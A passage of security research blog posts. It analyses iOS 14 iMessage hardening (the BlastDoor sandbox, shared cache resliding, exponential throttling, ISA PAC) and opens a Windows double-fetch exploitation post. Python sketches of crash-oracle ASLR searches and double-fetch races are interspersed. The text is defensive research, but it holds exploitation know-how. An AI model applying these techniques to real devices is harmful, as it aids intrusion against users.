        content: Optional(BlastDoor.AttributedString(

            attributes: [

                BlastDoor.BaseWritingDirectionAttribute(

                    range: Range(0..<11), direction: WritingDirection.natural

                ),

                BlastDoor.MessagePartAttribute(

                    range: Range(0..<11), partNumber: 0

                )

            ],

            string: "Hello World"

        )),

        _participantDestinationIdentifiers: [

            "mailto:[email protected]",

            "mailto:[email protected]"

        ],

        attributionInfo: []

    )),

    encryptionType: BlastDoor.TextMessage.EncryptionType.pair_ec,

    replyToGUID: Optional(6401430E-CDD3-4BC7-A377-7611706B431F),

    _threadIdentifierGUID: nil,

    _expressiveSendStyleIdentifier: nil,

    _groupID: Optional("008412B9-A4F7-4B96-96C3-70C4276CB2BE"),

    currentGroupName: nil,

    groupParticipantVersion: Optional(0),

    groupProtocolVersion: Optional(8),

    groupPhotoCreationTime: nil,

    messageSummaryInfo: nil,

    nicknameInformation: nil,

    truncatedNicknameRecordKey: nil

)

One can roughly associate every field in this data structure with parts of the on-wire iMessage format. For example, the plainTextBody field contains the content of the `t` field, while the content field corresponds to the content of the `x` field.

Besides simple text messages, iMessages can additionally contain attachments (essentially arbitrary files which are encrypted and temporarily uploaded to iCloud) as well as rather complex serialized NSKeyedArchiver archives, which have been the source of bugs in the past.

For these types of iMessages, the following additional parsing steps are necessary:

  1. Unpack attachment metadata (NSKeyedArchiver format)
  2. Download attachments from iCloud server
  3. Deserialize NSKeyedArchiver plugin archives and generate a preview for the notification

As an example, consider what happens when a user sends a link to a website over iMessage. In that case, the sending device will first render a preview of the webpage and collect some metadata about it (such as the title and page description), then pack those fields into an NSKeyedArchiver archive. This archive is then encrypted with a temporary key and uploaded to the iCloud servers. Finally, the link as well as the decryption key are sent to the receiver as part of the iMessage. In order to create a useful user notification about the incoming iMessage, this data has to be processed by the receiver on a 0-click code path. As that again involves a fair amount of complexity, it is also done inside BlastDoor: after receiving the BlastDoor reply from above and realizing that the message contains an attachment, imagent first instructs IMTransferAgent to download and decrypt the iCloud attachment. Afterwards, it will call into -[IMTranscodeController decodeiMessageAppPayload:bundleID:completionBlock:blockUntilReply:] which forwards the relevant data to the IMTranscoderAgent, which then proceeds into +[IMAttachmentBlastdoor sendBalloonPluginPayloadData:withBundleIdentifier:completionBlock:] and finally calls -[IMMessagesBlastDoorInterface defuseBalloonPluginPayload:withIdentifier:resultHandler:].

In the BlastDoor service, the plugin data decoding is then again performed in Swift and dispatched to the corresponding plugin type, as determined by the plugin id. For RichLinks (plugin id com.apple.messages.URLBalloonProvider), processing ends up in LinkPresentation.MessagesPayload.init(dataRepresentation:), which deserializes the NSKeyedArchiver payload and extracts the preview image and URL metadata from it in order to generate a preview message.

Sandboxing

The sandbox profile can be found in System/Library/Sandbox/Profiles/blastdoor.sb and is also attached at the end of this blog post. It appears to be identical on iOS and macOS. The profile can be studied statically or dynamically, for example by using the sandbox-exec tool:

> echo "(allow process-exec (literal \"$(pwd)/test\"))" >> ./blastdoor.sb

> clang -o test test.c   # try to open files, network connections, etc.

> sandbox-exec -f ./blastdoor.sb ./test

The sandbox profile states:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

And indeed, the sandbox profile is quite tight:

  • only a handful of local IPC services, namely diagnosticd, logd, opendirectoryd, syslogd, and notifyd, can be reached
  • almost all file system interaction is blocked
  • any interaction with IOKit drivers (historically a big source of vulnerabilities) is forbidden
  • outbound network access is denied

Furthermore, the profile makes use of syscall filtering to restrict the interactions with the core kernel. However, as of now the syscall filter seems to be in “permissive” mode:

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

As such, the BlastDoor service is still allowed to perform any syscall, but it is to be expected that the syscall filtering will soon be put into “enforcement mode”, which would further boost its effectiveness.

Crash Monitoring?

An interesting side effect of the new processing pipeline is that imagent is now able to detect when an incoming message caused a crash in BlastDoor (it will receive an XPC error). Even more interesting is the fact that imagent appears to be informing Apple’s servers about such events, as can be seen by setting a breakpoint on -[APSConnectionServer handleSendOutgoingMessage:] in apsd, the daemon responsible for implementing Apple’s push services (on top of which iMessage is built). Displaying the outgoing message will show the following:

(lldb) po [$x2 dictionaryRepresentation]

{

    APSCritical = 1;

    APSMessageID = 543;

    APSMessageIdentifier = 1520040396;

    APSMessageTopic = "com.apple.madrid";

    APSMessageUserInfo =     {

        c = 115;

        fR = 13500;

        fRM = "c-100-BlastDoor.Explosion-1-com.apple.BlastDoor.XPC-ServiceCrashed";

        fU = {length = 16, bytes = 0x3a4912626c9645f98cb26c7c2d439520};

        i = 1520040396;

        nr = 1;

        t = {length = 32, bytes = ... };

        ua = "[macOS,11.1,20C69,Macmini9,1]";

        v = 7;

    };

    APSOutgoingMessageSenderTokenName = 501;

    APSPayloadFormat = 1;

    APSTimeout = 120;

    APSTimestamp = "2021-01-06 19:52:10 +0000";

}

As can be seen, imagent is apparently informing the iMessage servers that the message with the UUID 0x3a4912626c9645f98cb26c7c2d439520 (fU key) has caused a crash in BlastDoor.

It is unclear what the purpose of this is without access to the server’s code. While these notifications may simply be used for statistical purposes, they would also give Apple a fairly clear signal about attacks against iMessage involving brute-force and a somewhat weaker signal about any failed exploits against the BlastDoor service.

In my experiments, after observing one of these crash notifications, the server would start directly sending delivery receipts to the sender for messages that hadn't actually been processed by the receiver yet. Possibly this is another, independent effort to break the crash oracle technique by confusing the sender, but that is hard to verify without access to the code running on the server. In any case, it is worth noting that this “spoofing” of delivery receipts by the server is generally possible as the message UUID, which is more or less the only content of a delivery receipt, is part of the non-end2end encrypted payload and is thus known to the server (break on -[APSConnectionServer handleSendOutgoingMessage:] and inspect outgoing iMessages to verify this, the UUID will be in the U key, while the e2e-encrypted data will be in the P key). This is most likely necessary so the server can track which messages have already been delivered and which ones it still needs to keep around for delivery in the future.

Shared Cache Resliding

Previously, when exploiting an iMessage memory corruption bug, a “crash oracle” could be used to reveal the location of the shared cache region in memory: the attacker would trigger the memory corruption bug in a way that would cause an access to a memory location somewhere in the region 0x180000000 - 0x280000000 (where the shared cache can be mapped). If the memory was valid, no crash would occur and imagent would then send a delivery receipt to the attacker. However, if a crash occurred, no such receipt would be delivered, informing the attacker that the address was unmapped. Through clever selection of the queried addresses, the location of the shared cache could be revealed in logarithmic time, with only about 20 messages.
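To make the "about 20 messages" figure concrete, here is a minimal Python sketch of such a search. It is a simulation only: `is_mapped` stands in for sending one message and waiting for a delivery receipt, and the 1 GiB cache size and 16 KiB slide granularity are assumptions chosen for illustration, not values taken from the original research.

```python
REGION_START = 0x180000000   # range quoted in the text
REGION_END = 0x280000000
CACHE_SIZE = 0x40000000      # assumption: 1 GiB shared cache
PAGE_SIZE = 0x4000           # assumption: 16 KiB slide granularity


def find_shared_cache_base(is_mapped):
    """Locate the cache base; each is_mapped(addr) call models one message.

    True stands for "delivery receipt received", False for "crash".
    """
    # Phase 1: probe at cache-sized strides; one of these probes must hit.
    hit = None
    for addr in range(REGION_START, REGION_END, CACHE_SIZE):
        if is_mapped(addr):
            hit = addr
            break
    if hit is None:
        raise RuntimeError("no mapped address found; assumptions violated")
    if hit == REGION_START:
        return hit  # the cache cannot start below the region
    # Phase 2: binary search for the lowest mapped page in (hit - size, hit].
    lo, hi = hit - CACHE_SIZE, hit  # invariant: lo is unmapped, hi is mapped
    while hi - lo > PAGE_SIZE:
        mid = lo + ((hi - lo) // PAGE_SIZE // 2) * PAGE_SIZE
        if is_mapped(mid):
            hi = mid
        else:
            lo = mid
    return hi


def make_oracle(base, log):
    """Hypothetical simulated target: records every probe in `log`."""
    def is_mapped(addr):
        log.append(addr)
        return base <= addr < base + CACHE_SIZE
    return is_mapped
```

Under these assumptions the first phase needs at most 4 probes and the second exactly 16 (since 1 GiB / 16 KiB = 2^16), which is in line with the roughly 20 messages mentioned above. The search only works if the cache stays at the same address between probes.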

However, with iOS 14 Apple has added a mechanism to re-randomize the location of the shared cache region for an “attacked” process, thus breaking a fundamental assumption of this technique and rendering it ineffective. This is significant as the crash oracle technique was one of very few, if not the only, fairly generic ASLR bypass techniques usable in 0-click iMessage attacks.

To understand how the shared cache resliding works, one can start by looking at the kernel. In iOS 14, the kernel can now have two active shared cache regions: the “regular” region and a “reslided” region. During an attack, the following then happens:

  1. When an attacker attempts to use a crash-oracle-based technique, the attacked process will quickly end up accessing unmapped memory in the range 0x180000000 - 0x280000000 (where the shared cache is mapped) and crash
  2. The kernel handles the segmentation fault generated by the CPU, and sets a specific flag in the crash info that signals that the crash happened inside the shared cache region
  3. At the same time, the kernel will mark the currently active reslided shared cache region (if one exists) as stale, causing it to be recreated and thus re-randomized the next time it is used
  4. launchd (as the parent process of the crashed service) receives the crash info, notices the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and sets the ReslideSharedCache property on the service associated with the crashed process (see `launchctl procinfo $pid` and search for `reslide shared cache = 1`)
  5. The next time the service is restarted, launchd then adds the POSIX_SPAWN_RESLIDE attribute for posix_spawn due to the ReslideSharedCache property
  6. In the kernel, this flag now causes the newly created process to be given the reslided shared cache image. However, as no active reslided region currently exists (the previous one was marked as stale in step 3.), a new one is created at a newly randomized address.

The result of this is that whenever an attacker attempts to use a crash oracle to break ASLR, the attacked service receives a different shared cache region every time it is launched, thus preventing the attack from succeeding. For the time being, this feature appears to only be active on iOS, but it would be expected to come to macOS as well.

While this mechanism would in principle also protect 3rd party apps from similar attacks, protection for those is currently somewhat weaker, likely in order to first evaluate the real-world performance impact of this change (the shared cache is a significant performance optimization of the OS). In particular, step 3 is currently only performed if the crashing process is a platform binary (essentially binaries that ship with the OS and are directly signed by Apple) such as the services handling iMessages. However, for 3rd party processes, it would only happen if the global vm_shared_region_reslide_restrict is set to zero:

/*

 * Flag to control what processes should get shared cache randomize resliding

 * after a fault in the shared cache region:

 *

 * 0 - all processes get a new randomized slide

 * 1 - only platform processes get a new randomized slide

 */

This global is controlled by the vm_shared_region_reslide_restrict bootarg, which currently seems to be set to one. In essence, for 3rd party apps this means:

  1. When the attacked process first crashes, the kernel will still set the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and launchd will add the ReslideSharedCache property, but the current reslided region won’t be invalidated
  2. The service is then restarted and now uses the “reslided” shared cache region
  3. When the service crashes the next time, and if that service is the only one currently using the reslided shared cache region (which should usually be the case, but could possibly be influenced by the attacker), the region’s refcount drops to zero, and the shared cache region is marked for removal.
  4. However, removal will only actually happen after two minutes. As such, if the service is restarted within two minutes, it will receive the same shared cache region at the same location in memory.

As a result, a third-party app could still be attacked through a crash-oracle technique if it automatically sends some form of delivery receipt to the sender and restarts quickly enough after a crash. This could, however, be prevented for example by enabling ExponentialThrottling for these services. Ideally, and assuming that the performance penalty is reasonable, Apple would enable re-randomization for all apps in the future.
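The difference between the two cases can be illustrated with a small Python model. This is a toy state machine written from the description above, not code derived from the kernel: the class and method names are hypothetical, a counter stands in for a freshly randomized slide, and time is passed in explicitly as seconds.

```python
import itertools

REMOVAL_DELAY = 120  # seconds; the "two minutes" mentioned above


class KernelModel:
    """Toy model of the reslided shared cache region (names are hypothetical)."""

    def __init__(self, reslide_restrict=1):
        self.reslide_restrict = reslide_restrict
        self._slides = itertools.count(1)  # stand-in for fresh random slides
        self.reslided_addr = None          # active reslided region, if any
        self.users = 0                     # processes using that region
        self.unused_since = None           # when the refcount dropped to zero

    def spawn_reslided(self, now):
        """Model posix_spawn with POSIX_SPAWN_RESLIDE; returns the region address."""
        expired = (self.reslided_addr is not None and self.users == 0
                   and now - self.unused_since >= REMOVAL_DELAY)
        if self.reslided_addr is None or expired:
            self.reslided_addr = 0x180000000 + next(self._slides) * 0x4000
        self.users += 1
        self.unused_since = None
        return self.reslided_addr

    def crash_in_shared_region(self, now, platform_binary, used_reslided):
        """Model a crash caused by a fault inside the shared cache range."""
        if used_reslided:
            self.users -= 1
            if self.users == 0:
                self.unused_since = now
        if platform_binary or self.reslide_restrict == 0:
            # Region is marked stale, so the next use creates a new one.
            self.reslided_addr = None
            self.users = 0
            self.unused_since = None
```

In this model, a third-party service that crashes and restarts within two minutes gets the same address back, whereas a platform binary gets a new address after every such crash. Setting `reslide_restrict=0` makes third-party processes behave like platform binaries.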

Exponential Throttling

Another thing we suggested back in 2019 was to limit the number of attempts an attacker gets when attempting to exploit a vulnerability. This was mostly important to defend against the crash-oracle technique, but would also help to prevent brute force attacks (e.g., given enough attempts, one could simply brute force the location of the shared cache region). The new ExponentialThrottling feature in launchd seems to achieve just that.

To use it, a system daemon or agent has to opt in by setting “_ExponentialThrottling = 1” in its Info.plist (essentially the service metadata), as can be seen below for the BlastDoor service:

> plutil -p /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/Versions/A/XPCServices/MessagesBlastDoorService.xpc/Contents/Info.plist

{

  "CFBundleDisplayName" => "MessagesBlastDoorService"

  "CFBundleExecutable" => "MessagesBlastDoorService"

  "CFBundleIdentifier" => "com.apple.MessagesBlastDoorService"

  ...

  "XPCService" => {

    "_ExponentialThrottling" => 1

  }

}

Apart from the BlastDoor service, it is also used for imagent:

> plutil -p /System/Library/LaunchAgents/com.apple.imagent.plist

{

  "_ExponentialThrottling" => 1

  ...

but doesn’t appear to be used for any other service, as can, for example, be seen by looking at the output of the launchctl dumpstate command, which will only show “exponential throttling = 1” for com.apple.imagent and com.apple.MessagesBlastDoorService.

Presumably, the _ExponentialThrottling property instructs launchd (the macOS and iOS init process) to delay subsequent restarts of a crashing service. While it is somewhat challenging to statically reverse engineer launchd due to the lack of source code or binary symbols, it is fortunately fairly easy to experimentally determine the impact of the _ExponentialThrottling property, for example by installing a custom daemon that writes the current timestamp to a file before crashing. By default, that is, without ExponentialThrottling, one would see the following:

Service started on Wed Jan  6 13:56:03 2021

Service started on Wed Jan  6 13:56:13 2021

Service started on Wed Jan  6 13:56:23 2021

Service started on Wed Jan  6 13:56:33 2021

As can be seen, by default, a service is, at the earliest, restarted ten seconds after it was previously started. However, using the following service plist which enables ExponentialThrottling:

> # Start service with

> # launchctl bootstrap system /Library/LaunchDaemons/net.saelo.test.plist

> plutil -p /Library/LaunchDaemons/net.saelo.test.plist

{

  "_ExponentialThrottling" => 1

  "KeepAlive" => 1

  "Label" => "net.saelo.test"

  "POSIXSpawnType" => "Interactive"

  "Program" => "/path/to/program"

}

One can observe the following:

Service started on Wed Jan  6 10:42:43 2021

Service started on Wed Jan  6 10:42:53 2021 (+10s)

Service started on Wed Jan  6 10:43:03 2021 (+10s)

Service started on Wed Jan  6 10:43:13 2021 (+10s)

Service started on Wed Jan  6 10:43:33 2021 (+20s)

Service started on Wed Jan  6 10:44:13 2021 (+40s)

Service started on Wed Jan  6 10:45:33 2021 (+80s)

Service started on Wed Jan  6 10:48:13 2021 (+160s [~2.5m])

Service started on Wed Jan  6 10:53:33 2021 (+320s [~5m])

Service started on Wed Jan  6 11:04:13 2021 (+640s [~10m])

Service started on Wed Jan  6 11:24:13 2021 (+20m)

Service started on Wed Jan  6 11:44:13 2021 (+20m)

Service started on Wed Jan  6 12:04:13 2021 (+20m)

Here, the exponential increase in the time between subsequent restarts is clearly visible, and goes up to an apparent maximum of 20 minutes. And indeed, launchd does contain the following bit of code in a function presumably responsible for computing the next restart delay (search for XREFs to the string "%s: service throttled by %llu seconds"):

  if ( delay >= 1200 )

    result = 1200LL;                 // 20 minutes

  else

    result = delay;

With this change, an exploit that relied on brute force would now only get one attempt every 20 minutes instead of every 10 seconds.
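The observed schedule can be reproduced with a few lines of Python. The formula below is only a fit to the timestamps shown above (three restarts at the base delay, then doubling, capped at 1200 seconds); it is not launchd's actual algorithm, and the function names are made up for this sketch.

```python
BASE_DELAY = 10       # seconds; default minimum time between starts
MAX_DELAY = 1200      # seconds; the 20 minute cap found in launchd
FREE_RESTARTS = 3     # restarts observed at the base delay before doubling


def restart_delay(n):
    """Delay in seconds before the n-th restart (n >= 1), fitted to the log above."""
    doublings = max(0, n - FREE_RESTARTS)
    return min(MAX_DELAY, BASE_DELAY * 2 ** doublings)


def restarts_within(seconds, throttled=True):
    """Count how many restarts (i.e. extra attempts) fit into a time budget."""
    elapsed = 0
    count = 0
    while True:
        delay = restart_delay(count + 1) if throttled else BASE_DELAY
        if elapsed + delay > seconds:
            return count
        elapsed += delay
        count += 1
```

With this model, `restarts_within(86400, throttled=False)` gives 8640 attempts per day, while `restarts_within(86400)` gives 79, which shows how sharply the feature reduces what a brute-force attack gets to try.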

(Upcoming?) ObjectiveC ISA PAC

The PoC exploit against iMessage on iOS 12.4 relied heavily on faking ObjectiveC objects to gain a form of arbitrary code execution despite the presence of pointer authentication (PAC). This was mainly possible because the ISA field, containing the pointer to the Class object and thus making a piece of memory appear like a valid ObjectiveC object, was not protected through PAC and could thus be faked. With iOS 14, this now seems to be changing: while previously, the top 19 bits of the ISA value contained the inline refcount, it now appears that this field has been reduced to 9 bits (of which the LSB appears to be reserved for some purpose, leaving an 8-bit inline refcount, see the bit shifting logic in objc_release or objc_retain), while the freed-up bits now hold a PAC, as can be seen in objc_rootAllocWithZone in libobjc.dylib:

    ; Allocate the object

    BL              j__calloc_3

    CBZ             X0, loc_1953DA434

    MOV             X8, X0

    ; “Tag” the address with a constant to get a PAC modifier value

    MOVK            X8, #0x6AE1,LSL#48        

    MOV             X9, X19

    ; Compute PAC of Class pointer with tagged object address as modifier

    PACDA           X9, X8

    ; Clear top 9 bits (inline refcnt) and bottom 3 bits (other bitfields)       

    AND             X8, X9, #0x7FFFFFFFFFFFF8

    ; Set LSB and inline refcount to one

    MOV             X9, #0x100000000000001

    ORR             X9, X8, X9

    ; Presumably, the refcnt isn’t used for all types of classes...

    TST             W20, #0x2000

    CSEL            X8, X9, X8, EQ

    ; Store the resulting value into the ISA field

    STR             X8, [X0]

However, the ISA PAC currently appears to never be checked, so it doesn’t yet affect any exploits. The most likely reason for this is that the ISA PAC feature is being rolled out in multiple phases, with the current implementation meant to allow in-depth performance evaluation, in particular of the reduced size of the inline refcount, which will likely cause more objects to use the more expensive out-of-line refcounting (used once the inline refcount saturates). With that, it can be expected that, in the absence of major performance issues, future releases of iOS and macOS will use PAC for the ObjC ISA field, thus likely breaking exploits that have to rely on faking ObjectiveC objects to achieve arbitrary code execution.
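The bit manipulation in the disassembly above can be restated in Python to make the resulting ISA layout easier to follow. This sketch only mirrors the MOVK/AND/ORR/CSEL steps; the PACDA instruction itself depends on a hardware key and is not modelled, so the already signed class pointer is simply passed in. The function names are hypothetical.

```python
ISA_KEEP_MASK = 0x007F_FFFF_FFFF_FFF8  # AND mask: drops top 9 and bottom 3 bits
ISA_INIT_BITS = 0x0100_0000_0000_0001  # ORR value: inline refcount = 1, LSB = 1
NO_INLINE_RC_FLAG = 0x2000             # bit tested via TST W20, #0x2000


def pac_modifier(obj_addr):
    """MOVK X8, #0x6AE1, LSL#48: replace the top 16 bits of the object address."""
    return (obj_addr & 0x0000_FFFF_FFFF_FFFF) | (0x6AE1 << 48)


def pack_isa(signed_class_ptr, class_flags):
    """Build the value stored into the ISA field from a PAC-signed class pointer."""
    isa = signed_class_ptr & ISA_KEEP_MASK
    if class_flags & NO_INLINE_RC_FLAG == 0:  # CSEL ..., EQ picks the ORR result
        isa |= ISA_INIT_BITS
    return isa


def inline_refcount(isa):
    """Read back the 8-bit inline refcount from the top byte of the ISA value."""
    return isa >> 56
```

Because only 8 bits remain for the inline refcount in this layout, it can hold values up to 255, which is why more objects would be expected to fall back to out-of-line refcounting.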

Conclusion

This blog post discussed three improvements in iOS 14 affecting iMessage security: the BlastDoor service, resliding of the shared cache, and exponential throttling. Overall, these changes are probably very close to the best that could’ve been done given the need for backwards compatibility, and they should have a significant impact on the security of iMessage and the platform as a whole. It’s great to see Apple putting aside the resources for these kinds of large refactorings to improve end users’ security. Furthermore, these changes also highlight the value of offensive security work: not just single bugs were fixed, but instead structural improvements were made based on insights gained from exploit development work.

As for the alleged NSO iMessage exploit, it may have been prevented from working against iOS 14 by any of the following:

  • The bug was fixed in iOS 14, for example due to the rewrite of large parts of the iMessage processing pipeline in Swift
  • The mere fact that processing happens in a different process, which could for example break a heap layouting primitive
  • The shared cache resliding would break their exploit if their exploit relied on some form of crash oracle to break ASLR
  • The stronger sandbox of the BlastDoor service, which could prevent the exploitation of a privilege escalation vulnerability after compromising the BlastDoor process

While these are some possible scenarios, and it could be the case that the exploit “just” needs some re-engineering to function again, the fact that these security improvements were shipped is certainly a positive outcome.

Attachment 1: blastdoor.sb

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

;;;

;;; For all platforms: /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/XPCServices/MessagesBlastDoorService.xpc/MessagesBlastDoorService

(version 1)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Basic Rules

;;; -------------------------------------------------------------------------------------------- ;;;

;; Deny all default rules.

(deny default)

(deny file-map-executable process-info* nvram*)

(deny dynamic-code-generation)

;; Rules copied from system.sb. Ones that we've deemed overly permissive

;; or unnecessary for BlastDoor have been removed.

;; Allow read access to standard system paths.

(allow file-read*

       (require-all (file-mode #o0004)

                    (require-any (subpath "/System")

                                 (subpath "/usr/lib")

                                 (subpath "/usr/share")

                                 (subpath "/private/var/db/dyld"))))

(allow file-map-executable

       (subpath "/System/Library/CoreServices/RawCamera.bundle")

       (subpath "/usr/lib")

       (subpath "/System/Library/Frameworks"))

(allow file-test-existence (subpath "/System"))

(allow file-read-metadata

       (literal "/etc")

       (literal "/tmp")

       (literal "/var")

       (literal "/private/etc/localtime"))

;; Allow access to standard special files.

(allow file-read*

       (literal "/dev/random")

       (literal "/dev/urandom"))

(allow file-read* file-write-data

       (literal "/dev/null")

       (literal "/dev/zero"))

(allow file-read* file-write-data file-ioctl

       (literal "/dev/dtracehelper"))

;; TODO: Don't allow core dumps to be written out unless this is on a dev

;; fused device?

(allow file-write*

       (require-all (regex #"^/cores/")

                    (require-not (file-mode 0))))

;; Allow IPC to standard system agents.

(allow mach-lookup

       (global-name "com.apple.diagnosticd")

       (global-name "com.apple.logd")

       (global-name "com.apple.system.DirectoryService.libinfo_v1")

       (global-name "com.apple.system.logger")

       (global-name "com.apple.system.notification_center"))

;; Allow mostly harmless operations.

(allow signal process-info-dirtycontrol process-info-pidinfo

       (target self))

;; Temporarily allow sysctl-read with reporting to see if this is

;; used for anything.

(allow (with report) sysctl-read)

;; We don't need to post any darwin notifications.

(deny darwin-notification-post)

;; We shouldn't allow any other file operations not covered under

;; the default of deny above.

(deny file-clone file-link)

;; Don't deny file-test-existence: <rdar://problem/59611011>

;; (deny file-test-existence)

;; Don't allow access to any IOKit properties.

(deny iokit-get-properties)

(deny mach-cross-domain-lookup)

;; Don't allow BlastDoor to spawn any other XPC services other than

;; ones that we can intentionally whitelist later.

(deny mach-lookup (xpc-service-name-regex #".*"))

;; Don't allow any commands on sockets.

(deny socket-ioctl)

;; Denying this should have no ill effects for our use case.

(deny system-privilege)

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

(allow syscall-unix

       (syscall-number SYS_exit)

       (syscall-number SYS_kevent_qos)

       (syscall-number SYS_kevent_id)

       (syscall-number SYS_thread_selfid)

       (syscall-number SYS_bsdthread_ctl)

       (syscall-number SYS_kdebug_trace64)

       (syscall-number SYS_getattrlist)

       (syscall-number SYS_sigsuspend_nocancel)

       (syscall-number SYS_proc_info)

       

       (syscall-number SYS___disable_threadsignal)

       (syscall-number SYS___pthread_sigmask)

       (syscall-number SYS___mac_syscall)

       (syscall-number SYS___semwait_signal_nocancel)

       (syscall-number SYS_abort_with_payload)

       (syscall-number SYS_access)

       (syscall-number SYS_bsdthread_create)

       (syscall-number SYS_bsdthread_terminate)

       (syscall-number SYS_close)

       (syscall-number SYS_close_nocancel)

       (syscall-number SYS_connect)

       (syscall-number SYS_csops_audittoken)

       (syscall-number SYS_csrctl)

       (syscall-number SYS_fcntl)

       (syscall-number SYS_fsgetpath)

       (syscall-number SYS_fstat64)

       (syscall-number SYS_fstatfs64)

       (syscall-number SYS_getdirentries64)

       (syscall-number SYS_geteuid)

       (syscall-number SYS_getfsstat64)

       (syscall-number SYS_getgid)

       (syscall-number SYS_getrlimit)

       (syscall-number SYS_getuid)

       (syscall-number SYS_ioctl)

       (syscall-number SYS_issetugid)

       (syscall-number SYS_lstat64)

       (syscall-number SYS_madvise)

       (syscall-number SYS_mmap)

       (syscall-number SYS_munmap)

       (syscall-number SYS_mprotect)

       (syscall-number SYS_mremap_encrypted)

       (syscall-number SYS_open)

       (syscall-number SYS_open_nocancel)

       (syscall-number SYS_openat)

       (syscall-number SYS_pathconf)

       (syscall-number SYS_pread)

       (syscall-number SYS_read)

       (syscall-number SYS_readlink)

       (syscall-number SYS_shm_open)

       (syscall-number SYS_socket)

       (syscall-number SYS_stat64)

       (syscall-number SYS_statfs64)

       (syscall-number SYS_sysctl)

       (syscall-number SYS_sysctlbyname)

       (syscall-number SYS_workq_kernreturn)

       (syscall-number SYS_workq_open)

)

;; Still allow the system call but report in log.

(allow (with report) syscall-unix)

;; For validating the entitlements of clients. This is so only entitled

;; clients can pass data into a BlastDoor instance.

(allow process-info-codesignature)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Reading Files

;;; -------------------------------------------------------------------------------------------- ;;;

;; Support for BlastDoor receiving sandbox extensions from clients to either read files, or

;; write to a target location.

;; com.apple.app-sandbox.read

(allow file-read*

       (extension "com.apple.app-sandbox.read"))

;; com.apple.app-sandbox.read-write

(allow file-read* file-write*

       (extension "com.apple.app-sandbox.read-write"))

Windows Exploitation Tricks: Trapping Virtual Memory Access

Posted by James Forshaw, Project Zero

This blog is a continuation of my series of Windows exploitation tricks. This one describes an exploitation trick I’ve been trying to develop for years, succeeding (mostly, more on that later) on the latest versions of Windows 10. It’s a trick to trap access to virtual memory, get feedback when it occurs and delay access indefinitely. The blog will go into some of the background for why this technique is useful, an overview of the research I did to find the trick as well as an overview of the types of vulnerabilities it can be used with.

Background

When would you need such an exploitation trick? A good example of the types of security vulnerabilities which can benefit can be found in the seminal Bochspwn research by Mateusz Jurczyk and Gynvael Coldwind. The research showed a way of automating the discovery of memory double-fetches in the Windows kernel.

If you’ve not read the paper, a double-fetch is a type of Time-of-Check Time-of-Use (TOCTOU) vulnerability where code reads a value from memory, such as a buffer length, verifies that value is within bounds and then rereads the value from memory before use. By swapping the value in memory between the first and second fetches the verification is bypassed which can lead to security issues such as privilege escalation or information disclosure. The following is a simple example of a double fetch taken from the original paper.

DWORD* lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (*lpInputPtr > sizeof(LocalBuffer)) { ①

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);②

This code copies a buffer from a controlled user mode address into a fixed sized stack buffer. The buffer starts with a DWORD size value which indicates the total size of the buffer. Memory corruption can occur if the size value pointed to by lpInputPtr changes between the first read of the size value to compare against the buffer size ① and the second read of the size when copying into the buffer ②. For example, if the first time the value is read it’s 100 and the second it’s 400, then the code will pass the size check, as 100 is less than 256, but will then copy 400 bytes into that buffer, corrupting the stack.
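The same pattern can be simulated deterministically in Python. In this sketch the racing writer thread is replaced by a hypothetical `RacingMemory` object that hands out a scripted sequence of values on successive reads, so no real race or memory corruption takes place; the functions only report how many bytes would have been copied.

```python
LOCAL_BUFFER_SIZE = 256


class RacingMemory:
    """User-controlled memory whose size field changes between reads."""

    def __init__(self, values):
        self._values = iter(values)

    def read_size(self):
        # Each call models one fetch of *lpInputPtr from user memory.
        return next(self._values)


def vulnerable_copy(mem):
    """Double fetch: the size is read once for the check and again for the copy."""
    if mem.read_size() > LOCAL_BUFFER_SIZE:   # first fetch (check)
        return ("STATUS_INVALID_PARAMETER", 0)
    copied = mem.read_size()                  # second fetch (use)
    return ("copied", copied)


def fixed_copy(mem):
    """Single fetch: the size is captured once and the same value is checked and used."""
    size = mem.read_size()
    if size > LOCAL_BUFFER_SIZE:
        return ("STATUS_INVALID_PARAMETER", 0)
    return ("copied", size)
```

Calling `vulnerable_copy(RacingMemory([100, 400]))` reports a 400 byte copy into the 256 byte buffer, while `fixed_copy` on the same input only ever sees the value 100. Capturing the value once into local memory is the usual way to remove this class of bug.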

Once a vulnerability such as this example was discovered Mateusz and Gynvael needed to exploit it. How they achieved exploitation is detailed in section 4 of the paper. The exploit techniques that were identified were all probabilistic. Exploitation typically required two threads racing each other, with one reading and one writing. The probabilistic nature of success is due to the probability that in between the first read from a memory location and the second read the writing thread sets a new value which exploits the vulnerability.

To widen the TOCTOU window many of the techniques described abuse the behavior of virtual memory on Windows. A process on Windows can typically access a large virtual memory region up to 8TiB size. This size is likely to be significantly larger than the physical memory in the system, especially considering the limit is per-process, not per-system. Therefore to maintain the illusion of such a large memory address space the kernel uses on-demand memory paging.

When memory is allocated in the process the CPU’s page tables are set up to indicate the presence of the memory region but are marked as invalid. At this point the virtual memory region has been allocated but there is no physical memory backing it. When the process tries to access that memory region the CPU will generate an exception, generally referred to as a page-fault, which is handled by the kernel.

The kernel can look up the memory address which was accessed to cause the page-fault and try and fix the address. How the page-fault is fixed depends on the type of memory access. A simple example is if the memory was allocated but not yet used the kernel will get a physical memory page, initialize it to zeros then adjust the page tables to map that new physical memory page at the faulting address. Once the page-fault has been fixed the faulting thread can be restarted at the instruction which accessed the memory and the memory access should now succeed as if it was always present.

A more complex scenario is if the page is part of a memory mapped file. In this case the kernel will need to request that the page’s data is read back from disk before it can satisfy the page-fault. This can take quite a long time, at least for spinning rust disks, so it might require the faulting thread to be suspended while it waits for the page to be read. Once the page has been read the memory can be fixed up, the original thread can be resumed and the thread restarted at the faulting instruction.

